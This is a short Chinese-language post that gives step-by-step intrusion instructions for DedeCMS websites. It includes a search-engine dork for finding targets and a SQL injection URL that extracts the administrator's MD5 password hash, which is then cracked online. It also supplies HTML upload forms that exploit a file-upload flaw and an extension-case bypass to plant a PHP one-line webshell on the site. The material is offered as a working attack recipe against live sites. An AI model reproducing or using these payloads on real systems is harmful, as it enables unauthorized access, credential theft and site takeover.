dede入侵步骤


--------------------------------------------------------


情简单整理下入侵测试的步骤:


漏洞利用实例
百度搜索关键字"Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc",获得使用DeDeCMS系统的网站。


注入漏洞。首先访问"/data/admin/ver.txt"页面获取系统最后升级时间,XXXXX说明已经修补2011年8月12日补丁,

 

然后访问"/member/ajax_membergroup.php?action=post&membergroup=1"页面,XXXXXX2说明存在该漏洞。


 


于是访问页面链接"/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`",


去掉前三位和最后一位,得到管理员的16位MD5码,www.cmd5.com在线破解成功。


 


上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,只要登陆会员中心,然后访问页面链接


"/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post",


说明通过"/plus/carbuyaction.php"已经成功调用了上传页面"/dialog/select_soft_post"

 

于是将Php一句话木马扩展名改为"rar"等,利用提交页面upload1.htm,

 

将下面的源码另存为upload1.htm,获得提交页面如图下。


<form action="[url=http://127.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post]


http://127.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post[/url]" method="post"


enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>


1,必须登陆用户。
2,将待上传PHP文件扩展名改为"zip|gz|rar|iso|doc|xsl|ppt|wps"其中之一。
3,newname为上传后的新文件名,扩展名使用大写绕过,如"Php"


 


提交后尽管页面出错,但是myfile.Php文件已经成功上传到网站根目录。


upload2.htm


<form name="form1" action="http://127.1/member/uploads_add.php" method="post" enctype="multipart/form-data" >
<input type="hidden" name="mediatype" value="4" />
<input type="hidden" name="_GET[cfg_mb_addontype]" value="P hp|Php|php" />
<input type="hidden" name="dopost" value="save" />
<input name="addonfile" type="file" id="addonfile" />
<button class="button2" type="submit" >提交</button>
</form>

 

 

你可能感兴趣的:(DEDE)